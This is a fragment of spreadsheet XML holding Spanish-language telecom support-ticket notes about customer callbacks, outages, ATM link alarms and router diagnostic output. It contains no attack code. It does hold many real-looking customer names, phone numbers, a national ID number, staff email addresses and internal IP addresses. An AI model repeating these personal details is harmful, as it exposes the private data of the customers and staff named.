 F4601412| IP2383058SV | BANCO DAVIVIENDA SALVADOREÑO S.A. | CARRETERA  SANTA ANA  KM 26.5 COMPLEJO INDUSTRIAL INTERCOMPLEX, ZONA LOURDES  DENTRO DE FABRICA
AGRADECEMOS BRINDAR FECHA Y HORA DE VISITA
TÉCNICOS:
DUI	CODIGO	NOMBRE
01320096-0	9401	OSCAR RENE VIDES
EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4601414</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ESTAFANY FIGUEROA 54807678 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001164407</t>
  </si>
  <si>
    <t>F4601422</t>
  </si>
  <si>
    <t>SE LLAMA CLIENTE MARIO ZUNIGA/ 84310679 SOLICITA VISITA TECNICA YA QUE INDICA QUE ENFRENTE HUBO UN ACCIDENTE Y BOTO UNOS ARBOLES Y BOTARON EL CABLE BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 8:00 A 17:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS.
DIRECCION: MINISTERIO DE EDUCACION SAN JUAN DELIMAY MUNICIPIO DEL  DELI.
ATENDERA EN SITIO: MARIO ZUNIGA
-ID 3001180400
**</t>
  </si>
  <si>
    <t>F4601423</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIME DOMINGO MENJIVAR-70716300 ## SE TIENE EN LINEA ## COMENTA QUE TODO ESTA OK- E INDIC QUE SOLITO RESTABLECIO EL SERVICIO ##VALDIA CIERRE##VALIDA QUE TIENE LLAMDDAS ENTRANES Y SALIETNES##VIVO</t>
  </si>
  <si>
    <t>F4601431</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
ATIENDE FABIOLA QUIEN INDICA QUE SE FUE LA ENERGIA COMERCIAL Y SE QUEDARON SIN SERVICIO.
AUTORIZA EL CIERRE.
3001171928
COLA:
NOMBRE: A: 22094949
NÚMERO: 22094949
DURACIÓN: 0:00:09
ESTADO: CONECTADA
DETALLES: 22094949
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 15:26:31</t>
  </si>
  <si>
    <t>F4601432</t>
  </si>
  <si>
    <t>SE HABLA AL GDN 26608900  LLAMADA COMPLETA, ATIENDE MARISOL QUIEN COMENTA QUE HACE DOS DIAS TUVIERON EL PROBLEMA, SOLICITA SE LLAME AL CLIENTE WILBER EN 15 MINUTOS.
3001191174
COLA:
NOMBRE: A: 0050326608900
NÚMERO: 0050326608900
DURACIÓN: 0:00:11
ESTADO: CONECTADA
DETALLES: 0050326608900
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 14/06/2022 16:24:49</t>
  </si>
  <si>
    <t>F4601433</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENE EDGARDO AL 78565904 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001183745
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RENE EDGARDO 78565904 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001194840</t>
  </si>
  <si>
    <t>F4601450</t>
  </si>
  <si>
    <t>SE LLAMMA A CLIENTE HENRY PEREZ-22404099-77505994  ## SE TIENE EN LINEA A SRITA DE RECEPCION##</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE  HENRY PEREZ- INDICA QUE LO QUE ESTA REPORTANDO ES QUE ALGUNAS LLAMADAS SE CORTAN EN ALGUN MOMENTO + QUE EN EL IDENTIFICADOR ALUGNAS LLAMADAS NO LE PARECEN EL NUMERO +  COMENTA QUE SE LE MARQUE A ESTE NUMERO 61575664</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS- SE REALIZAN  LLAMADAS##
RESULETADO:
AGENTE 31 - LLAMADA TODOOK- INDICA QUE NO HA TENIDO PROBLEMAS
AGENTE 21 - LLAMADA TODOO OK- ##NO HA TENIDO PROBLEMAS ##
##VIVO
##SE TRATO DE REALIZR LLAMADAS POR CIC, PERO EL AGENTE NO ESCUCHA-</t>
  </si>
  <si>
    <t>SE LLAMA A LCIENTE HENRY PEREZ-22404099 ##NO CONTESTA ##ENVIA A BUZON 3 VECES ##VIVO</t>
  </si>
  <si>
    <t>SE TRATA DE HACER OTRO SET DE PRUEBAS, DEBIDO AL TIPO DE REPORTE DEL CLIENTE,, PERO AL LLAMAR AL GDN 25293700 OPERADORA INDICA QUE  EL HORARIO DE ATENCION ES: LUNES A VIERNES DE 7:30 A 15:30 || SABADO 8 A 12
##SE DARA SEGUIMIENTO MAÑANA EN HORARIO HABIL DE CL</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY PEREZ-22404099-77505994-61575664 ### SE LE COMENTA EL RESULTADO DE LAS PRUEBAS ##CELITENQ EUDA ENTERADO Y PROCEDE A VERIFICAR A NVIEL INTERNO LAS EXTENSIONES ##SE PROCEDE AL CIERRE##PROBLEMA: LAN
3001533140
COLA:
NOMBRE: A: 0050361575664
NÚMERO: 0050361575664
DURACIÓN: 0:00:32
ESTADO: CONECTADA
DETALLES: 0050361575664
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 16/06/2022 10:51:41</t>
  </si>
  <si>
    <t>F4601456</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAVIER AL 35750883 SOLICITA QUE SE LE LLAME EN 10 MIN NUEVAMENTE **
-ID 3001184667
**</t>
  </si>
  <si>
    <t>F4601462</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDGAR BAIL AL 44263914 SOLICITA QUE SE LE LLAME EN 10 MIN **
-ID 3001186226
**</t>
  </si>
  <si>
    <t>SE LLAMA  ACLIENTE  EDGAR BAIL 44263914 MENCIONA QUE PERSISTE EL INCONVENIENTE CLIENTE MENCIONA QUE SE ESTA CONECTADO EN EL PUERTO 0/1/0
-ID 3001196351</t>
  </si>
  <si>
    <t>F4601485</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO RUIZ 70035180  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001617984</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. FRANCISCO RUIZ 70035180 INFORMA QUE POR EL MOMENTO ESTA ESTABLE PERO SOLICITA QUE SE LE MANTENGA EN OBSERVACION PARA MAÑANA A LAS 10:00 AM**
-ID 3001299281
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. FRANCISCO RUIZ 70035180 INFORMA QUE CONTINUAN REALIZANDO LAS PRUEBAS, INFORMA QUE REGRESARA LA LLAMADA ...</t>
  </si>
  <si>
    <t>EJECUTIVO DE CUENTA REALIZARA LA LLAMADA EN 30 MINS PARA VALIDAR ENLACE CON CLIENTE, CLIENTE YA CONECTO SU LAN PROCEDE A REALIZAR PRUEBAS, TOMAR EN CUENTA QUE ENLACE CONTINUA OPERATIVO Y ESATABLE, A NIVEL DE CLARO....</t>
  </si>
  <si>
    <t>CLIENTE REALIZANDO PRUEBAS, SE ESTA DEMOSTRANDO QUE EL PROBLEMA ESTA EN SU RED LAN, CLIENTE DESCONECTO SU LAN Y REALIZANDO PRUEBAS CON UNA SOLA PC Y VALIDA QUE NO HAY PROBLEMAS, SE ESTA AHISLANDO QUE LA CAUSA RAIZ DEL PROBLEMA ES LA LAN DEL CLIENTE...
IP2043012#SH PROCESSES CPU HISTORY
IP2043012   04:45:14 PM TUESDAY JUN 14 2022 GMT
      222222222222222222222222222223333322222222222222222222222224
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER SECOND (LAST 60 SECONDS)
          1  3  1  4516112 9799977978659657887888898997 1699617599
      444413454414489050746447273005297709740614706766770167406670
  100                        * *       *          * **    **    *
   90                      * ***  *    *        * ****    **    **
   80                      * ***  ***  *  *************   **  * **
   70                 *    *********** *  *************   **  * **
   60               * *    ****#***********************  **** ****
   50              ** *    ****#****#**********#**#**#*  *#** ***#
   40        *     ** *    #*###****##***##****##*#**##  *#** *#*#
   30        *     ** *    ######***##*#*##########*###  ###* *###
   20        *     *# # ** ########*##*############*###  #### ####
   10     *  #  *  ##*#*#**############################*##########
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER MINUTE (LAST 60 MINUTES)
              * = MAXIMUM CPU%   # = AVERAGE CPU%
      999
      885
  100 ***
   90 ***
   80 ***
   70 ***
   60 ***
   50 ***
   40 ***
   30 #**
   20 ##*
   10 ###
     0....5....1....1....2....2....3....3....4....4....5....5....6....6....7..
               0    5    0    5    0    5    0    5    0    5    0    5    0
                   CPU% PER HOUR (LAST 72 HOURS)
                  * = MAXIMUM CPU%   # = AVERAGE CPU%
IP2043012#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.130.194.225          0   C4B8.B484.9B97  ARPA   FASTETHERNET4
INTERNET  10.130.194.226         20   B07D.47E6.BA85  ARPA   FASTETHERNET4
INTERNET  10.130.194.227          -   4001.7A4A.1CD4  ARPA   FASTETHERNET4
INTERNET  192.130.160.1           0   INCOMPLETE      ARPA
INTERNET  192.130.160.4          20   1418.7799.E6FC  ARPA   VLAN1
INTERNET  192.130.160.5           0   INCOMPLETE      ARPA
INTERNET  192.130.160.19          0   INCOMPLETE      ARPA
INTERNET  192.130.160.60          0   INCOMPLETE      ARPA
INTERNET  192.130.160.69          0   INCOMPLETE      ARPA
INTERNET  192.130.160.75          0   INCOMPLETE      ARPA
INTERNET  192.130.160.76          0   INCOMPLETE      ARPA
INTERNET  192.130.160.80          0   INCOMPLETE      ARPA
INTERNET  192.130.160.107         0   INCOMPLETE      ARPA
INTERNET  192.130.160.117         0   INCOMPLETE      ARPA
INTERNET  192.130.160.119         0   INCOMPLETE      ARPA
INTERNET  192.130.160.124         0   INCOMPLETE      ARPA
INTERNET  192.130.160.126         0   INCOMPLETE      ARPA
INTERNET  192.130.160.219         0   INCOMPLETE      ARPA
INTERNET  192.130.160.231         0   INCOMPLETE      ARPA
INTERNET  192.130.160.232         0   INCOMPLETE      ARPA
INTERNET  192.130.160.233         0   INCOMPLETE      ARPA
INTERNET  192.130.160.254         -   4001.7A4A.1CD0  ARPA   VLAN1
IP2043012#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
FA0                            UP             UP
FA1                            ADMIN DOWN     DOWN
FA2                            ADMIN DOWN     DOWN
FA3                            ADMIN DOWN     DOWN
FA4                            UP             UP       WAN PRINCIPAL/_/IP2043012/_/
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
IP2043012#</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. FRANCISCO RUIZ 70035180 SOLICITA QUE SE LE LLAME A LAS 15:00 HRS NUEVAMENTE **
-ID 3001520129
**</t>
  </si>
  <si>
    <t>F4601488</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID MERLO 31861493 ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 3001201306</t>
  </si>
  <si>
    <t>F4601491</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 55194520 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; TIEMPO DE MONITOREO HA FINALIZADO.</t>
  </si>
  <si>
    <t>F4601492</t>
  </si>
  <si>
    <t>SE INTENTA CONECTAR CON BRYAN PARA SOLICITARLE URL DE PAGINAS LAS CUALES NO LOGRA INGRESAR, SE VALIDA SALIDA HACIA INTERNET OK Y SE CONTINA EN ESPERA DE DESLIST DE IP EN BLACKLIST-
NO SE COMPLETA LLAMADA--</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A BRYAN BARRIOS/CLIENTE; SE LE INDICA QUE SE ESTÁ TRABAJANDO EN EL DESLIST CON APOYO DE BO SEGURIDAD, YA NO CORRESPONDE A CLARO; AVANCES EN 4 DÍAS, UNA SEMANA.</t>
  </si>
  <si>
    <t>F4601496</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE WALTER BOLAÑOS, QUIEN INDICA QUE NO PUEDE SACAR LLAMADAS, CUANDO SACA UNA LLAMADA LE DA EL MENSAJE QUE TIENE BLOQUEO ADMINSTRATIVO.
3001182015
COLA:
NOMBRE: A: 0050370956640
NÚMERO: 0050370956640
DURACIÓN: 0:00:12
ESTADO: CONECTADA
DETALLES: 0050370956640
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 15:55:32</t>
  </si>
  <si>
    <t>F4601498</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE MARIO FAJARDO 50159388 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001248551</t>
  </si>
  <si>
    <t>F4601508</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 30280933 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001191131</t>
  </si>
  <si>
    <t>F4601509</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA LA SOLICITUD DE RFO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 8:24
PARA: DICTAMENES &lt;DICTAMENES@CLARO.COM.GT&gt;
CC: DICTAMENESCC &lt;DICTAMENESCC@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; HUGO ALEJANDRO JUAREZ LOPEZ &lt;HUGOA.JUAREZ@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE RFO || OPERADORA DE TIENDAS S.A. || F4601509 || SD1134798
BUEN DÍA
   SOLICITO DE SU APOYO CON LA ELABORACIÓN DE RFO CON LOS SIGUIENTES DATOS:
EMPRESA 	ID 	TICKET
OPERADORA DE TIENDAS S.A.
344400019T
SD1134798
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4601529</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  AMILCAR RIVERA 56956068 MENCIONA QUE ESTAN REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA PARA EL MEDIO DIA
-ID 3001265566</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  AMILCAR RIVERA 56956068  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001340791 - 3001340977</t>
  </si>
  <si>
    <t>F4601554</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROSA MARIA SANCHEZ AL 56169125 CONFIRMA SERVICIO ESTABLE PERO SOLICITA QUE SE MANTENGA EN OBSERVACION PARA LAS 13:00 HRS Y LUEGO SOLICITA QUE SE LE ENVIE LAS GRAFICAS DE LAS 8:00 A 13:00 HRS QUE TERMINARA EL MONITOREO Y ASI NOS PODRA CONFIRMAR || SE NOTIFICA A GESTOR **
ID 3001277634
**</t>
  </si>
  <si>
    <t>F4601559</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SUSANA ARGUETA 74999742 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001253514</t>
  </si>
  <si>
    <t>F4601592</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS ENRIQUE DE LEON  55327621 SE NECESITA REALIZAR PRUEBAS DE PRIMER NIVEL, NO CONTESTO IVR ENVIA A BUZON ID: 3001210793</t>
  </si>
  <si>
    <t>F4601608</t>
  </si>
  <si>
    <t>TICKET ASIGNADO A MARVIN TOC DE 5B
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
ESTIMAD@ KENNY.RIVERA, SU SOLICITUD  762928 HA SIDO ASIGNADA A MARVIN TOC.
INFORMACIÓN DE LOS DATOS
SOLICITANTE
 KENNY.RIVERA
EMAIL
 KENNY.RIVERA@CLARO.COM.GT
ESTADO
 EN EJECUCIÓN
DESCRIPCIÓN DEL REQUERIMIENTO
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO PARA EL ATM: CC_TYT_GT_ATM_4935, SOLICITAMOS SU APOYO EN VALIDAR QUE EQUIPO DE MARCA CTC QUE CONECTA CON EQUIPO TELDAT EN ATM SE ENCUENTRE ENERGIZADO, YA QUE SE OBSERVA PUERTO WAN EN ESTADO DOWN. ACTUALMENTE OPERATIVO ÚNICAMENTE POR REDUNDANCIA 3G. QUEDO AL PENDIENTE DE SUS COMENTARIOS.
TICKET: F4601608
ID: 47504069T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM_4935
UBICADO EN: CAJERO 4935_2 AVENIDA ZONA 1, SANTA ROSA DE LIMA, SANTA ROSA_SUPER MERCADO TONANTEL 1
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A MONITOREO DE CAJERO 5B ATIENDE WILLIAM RAMIREZ QUIEN INDICA QUE SEGUN LA INFORMACION QUE TIENENES, EL PRINCIPAL ESTA DESCONECTADO DEBIDO A DAÑO CON UPS, NO TIENEN SEGUIMIENTO ADICIONAL Y NO TIENEN FECHA ESTIMADA DE REPARACIÓN, SE LLAMARA A CARLOS SOSA O ERWIN CHOQUIN PARA SOLICITAR MAS INFORMACION
RESULTADO: LLAMADA HECHA
NOMBRE: 24207210
NÚMERO: 24207210
INICIO: HOY, 09:32
FIN: HOY, 09:37
DURACIÓN: 5:05
ID DE LLAMADA: 1001139803</t>
  </si>
  <si>
    <t>SE LLAMO ERWIN CHOQUIN QUIEN INDICA QUE NO TIENEN SEGUIMIENTO NI FECHA ESTIMADA, SOLICITA QUE SE LE DE ESTA SEMANA PARA VERIFICAR SI UPS FUE REPARADO E INDICA SE LE LLAME NUEVAMENTE EL DÍA LUNES 27
RESULTADO: LLAMADA HECHA
NOMBRE: 42343886
NÚMERO: 42343886
INICIO: HOY, 11:42
FIN: HOY, 11:47
DURACIÓN: 4:46
ID DE LLAMADA: 1001186964</t>
  </si>
  <si>
    <t>SE HABLA CON PERSONAL DE 5B, ATIENDE HECTOR, INFORMA QUE ENVIARA SUPERVISOR EL DIA DE MAÑANA PARA VALIDAR EQUIPOS ENERGIZADOS, SE EXPLICA QUE LOS TIEMPOS DE RESPUESTA SON BAJOS POR SER REDUNDANCIA LTE, PERO QUE ENLACE PRINCIPAL ESTA DOWN.
ID
1001005434
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:04:56
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 18/06/2022 18:04:49</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 12:35
PARA: SERVICIOS5B@5B.COM.GT &lt;SERVICIOS5B@5B.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; JOSE RODOLFO ESTRADA MUÑOZ &lt;JOSE.ESTRADA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: ALARMA DEL CAJERO: CC_TYT_GT_ATM_4935
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM_49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1608
ID: 47504069T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM_4935
UBICADO EN: CAJERO 4935_2 AVENIDA ZONA 1, SANTA ROSA DE LIMA, SANTA ROSA_SUPER MERCADO TONANTEL 1
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO A CLIENTE PARA VALIDAR QUE CTC SE ENCUENTRE ENERGIZADO, DESDE NODO SE OBSERVA DOWN, DESDE TELDAT PUERTO WAN DOWN.
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO PARA EL ATM: CC_TYT_GT_ATM_4935, SOLICITAMOS SU APOYO EN VALIDAR QUE EQUIPO DE MARCA CTC QUE CONECTA CON EQUIPO TELDAT EN ATM SE ENCUENTRE ENERGIZADO, YA QUE SE OBSERVA PUERTO WAN EN ESTADO DOWN. ACTUALMENTE OPERATIVO ÚNICAMENTE POR REDUNDANCIA 3G. QUEDO AL PENDIENTE DE SUS COMENTARIOS.
TICKET: F4601608
ID: 47504069T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM_4935
UBICADO EN: CAJERO 4935_2 AVENIDA ZONA 1, SANTA ROSA DE LIMA, SANTA ROSA_SUPER MERCADO TONANTEL 1
SALUDOS.</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO CON LA REVISION NUEVAMENTE YA QUE AUN ESTA CAIDAO EL PUERTO WAN DEL TELDAT, TOMAR EN CUENTA QUE ANTERIORMENTE SE DETERMINO TOMACORRIENTE DAÑADO
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE REVISA ENLACE Y ATM SE OBSERVAN ESTABLES
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>MARVIN TOC INFORMA QUE LO OBSERVA OPERATIVO
SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;
BUENA TARDE SE REVISA ENLACE Y ATM SE OBSERVAN ESTABLES
MARVIN TOC
SERVICIOS 5B
PBX: (502) 2420-7200</t>
  </si>
  <si>
    <t>F4601635</t>
  </si>
  <si>
    <t>SE CONVERSO CON CLIENTE, INDICA QUE NO POSEE SERVICIO DE WIFI, TIENE SERVICIO EN LAS COMPUTADORAS CON CLABLEADO, SE VALIDA QUE A CLIENTE SE EL PROPORCIONA CPE HUAWEI AR109W, AL QUE SE LE SOLICITA APLICARLE REINICIO, LUEGO DE APLICARLO EL SERVICIO SIGUE SIN RESTABLECER POR LO QUE SE COORDINARA VISITA PARA REVISAR EQUIPOS Y CONEXIONES EN PUNTO REMOTO.  CONFIRMA DATOS:
CONTACTO EN SITIO: MAYNOR LUNA 87103210
HORARIO DE ATENCION: 8:00 17:30 HORAS
DIRECCION: SEGUROS_AMERICA_PLAZA_PASEO_REAL_LEON_INTERNET, COPADO NORTE, INDEPENDIENTE COLOR BLANCO
PERMISOS: IDENTIFICACION SOLAMENTE</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAYNOR LUNA AL 87103210 EN SITIO PARA REALIZAR PRUEBAS || SE TRATA DE CONTACTAR A GESTOR NO SE OBTIENE RESPUESTA SE INTENTARA LUEGO **
-ID 3001248774
**</t>
  </si>
  <si>
    <t>SE LLAMA A MAYNOR PARA REALIZAR PRUEBAS PERO NO RESPONDE... CL CUELGA LLAMADA--
87103210</t>
  </si>
  <si>
    <t>F4601662</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE PEDRO HERNANDEZ 79513885 PERO NO CONTESTA Y ENVÍA A BUZÓN
3001271954
3001272179
3001272308</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE PEDRO HERNANDEZ 79513885 PERO NO CONTESTA Y ENVÍA A BUZÓN
3001297349
3001297523
3001297672</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  OSCAR VISCARRA  25207114 MENCIONA QUE YA NO PRESENTO NINGUN INCONVENIENTE CON EL SERVICIO
-ID 3001417737</t>
  </si>
  <si>
    <t>F4601673</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 50432149749 CONTESTA LA SEÑORITA GENESIS CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001240243
**</t>
  </si>
  <si>
    <t>F4601679</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
CLIENTE INDICA QUE YA POSEE LLAMADAS EN AMBAS VIAS.
3001216385
COLA:
NOMBRE: A: 77939999
NÚMERO: 77939999
DURACIÓN: 0:00:11
ESTADO: MARCANDO
DETALLES: 77939999
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 18:13:07</t>
  </si>
  <si>
    <t>F4601681</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JESSICA RAMOS 59678406 PARA BRINDAR RETROALIMENTACION
-ID 3001576426</t>
  </si>
  <si>
    <t>**SE LLLAMA A CLIENTE LYNDA MAYTE WUG CASTAÑEDA AL 54896646 INDICA QUE AUN CLIENTE NO HA REALIZADO PRUEBAS Y SE ESTA A ESPERA QUE REALIZE LAS PRUEBAS PARA QUE NOS LA COMPARTA **
-ID 3001241182
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELDER ORANTES 49800291 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001444390</t>
  </si>
  <si>
    <t>SE INTENTA CONTACTAR AL CLIENTE PERO NO SE OBTIENE RESPUESTA
3001520947
COLA:
NOMBRE: A: 59678406
NÚMERO: 59678406
DURACIÓN: 0:00:02
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:LLAMADA RECHAZADA (CÓDIGO CAUSA ISDN 21)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 59678406
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 16/06/2022 10:19:05</t>
  </si>
  <si>
    <t>F4601701</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ANDRES ESQUIVEL 22707730 QUIEN INDICA QUE YA REALIZÓ PRUEBAS Y VALIDA QUE EL SERVICIO YA SE ENCUENTRA OPERATIVO, AUTORIZA EL CIERRE DEL CASO.
3001556871
COLA:
NOMBRE: A: 22707730
NÚMERO: 22707730
DURACIÓN: 0:02:50
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 22707730
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 16/06/2022 11:57:29 A. M.</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE JACKELINE ZEPEDA 71278473  APOYA A UBICAR EQUIPO OP108 ALARMADO, PROCEDE A REINICIARLO ID: 3001253981</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JACKELINE ZEPEDA 71841253 -71841253 CLIENTE NO RESPONDE ENVIA A BUZON||
SE INTENTARA LUEGO **
-ID 3001529915 - 3001530139
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JACKELINE ZEPEDA 71841253 NO RESPONDE || ENVIA A BUZON || SE INTENTARA LUEGO **
-3001553555
**</t>
  </si>
  <si>
    <t>F4601702</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARIO JOVEL QUIEN INDICA QUE EL ID12670001
3001378883, 3001379053
COLA:
NOMBRE: A: 0050364201638
NÚMERO: 0050364201638
DURACIÓN: 0:00:08
ESTADO: MARCANDO
DETALLES: 0050364201638
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 14:07:20</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARIO JOVEL PERO NO CONTESTA.
3001225331,3001225397
COLA:
NOMBRE: A: 0050364201638
NÚMERO: 0050364201638
DURACIÓN: 0:00:40
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050364201638
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 19:26:43</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARIO JOVEL, QUIEN NO SABE DONDE ESTAN LOS EQUIPOS PERO INDICA QUE HAY PERSONAL LAS 24HRS.
SOLICITA QUE SE LE ENVIE TECNICO.
3001220128
COLA:
NOMBRE: A: 0050364201638
NÚMERO: 0050364201638
DURACIÓN: 0:00:40
ESTADO: CONECTADA
DETALLES: 0050364201638
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 14/06/2022 18:40:04</t>
  </si>
